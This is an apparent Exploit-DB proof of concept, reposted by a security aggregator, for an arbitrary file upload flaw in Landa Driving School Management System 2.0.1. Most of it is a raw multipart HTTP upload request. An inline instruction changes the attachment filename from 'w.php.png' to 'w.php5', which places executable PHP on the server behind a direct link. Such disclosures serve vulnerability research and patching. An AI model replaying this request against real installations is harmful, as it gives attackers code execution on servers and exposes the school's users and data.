[webapps] Landa Driving School Management System 2.0.1 - Arbitrary File Upload
2022-1-24 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:12 收藏

# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw

details 

POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost 
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"

sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"

e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"

91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>>  change this to w.php5
Content-Type: image/png


you will have a direct link to the uploaded files
            

文章来源: https://www.exploit-db.com/exploits/50681
如有侵权请联系:admin#unsafe.sh